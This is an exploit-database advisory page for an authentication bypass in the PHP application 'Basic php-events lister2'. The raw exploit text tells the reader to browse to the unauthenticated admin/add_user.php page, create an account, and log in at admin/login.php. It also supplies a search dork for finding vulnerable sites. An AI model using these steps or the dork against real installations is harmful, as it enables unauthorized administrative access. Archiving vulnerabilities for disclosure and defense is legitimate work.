header-logo
Suggest Exploit
vendor:
Basic php-events lister2
by:
RENO
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Basic php-events lister2
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Basic php-events lister2 ADD ADMIN Exploit

The exploit allows an attacker to bypass authentication and add a user to the Basic php-events lister2 application. The attacker can access the add_user.php page and add a user with any credentials. After that, the attacker can access the login.php page and gain access to the application.

Mitigation:

Ensure that authentication is properly implemented and enforced in the application.
Source

Exploit-DB raw data:

---------------------------------------
Basic php-events lister2 ADD ADMIN Exploit ..
---------------------------------------

#####################################################
# [+] Author : RENO #
# [+] Email : R7e@HoTMaiL.coM #
# [+] Site : www.vxx9.cc #
# [+] Team : SauDi ViRuS TeaM #
# [+] Dork : Powered by: mevin productions #
# [+] Script : Basic php-events lister2 #
#####################################################

[+] download : http://www.mevin.com/downloads/Basic-php-events-lister2.zip


The exploit :

Get in :

http://localhost/path/admin/add_user.php

and add your user ..

Example : r7e@hotmail.com - 123456

Then get in :

http://localhost/path/admin/login.php

and good luck :D

Thanks to : Allah ..


Greets : Jetli007 , ! BaD BoY ! , Dr.php , Gov.Hacker , AnTi SeCuRe ,
Dr.$audi , All Vxx9.Cc Members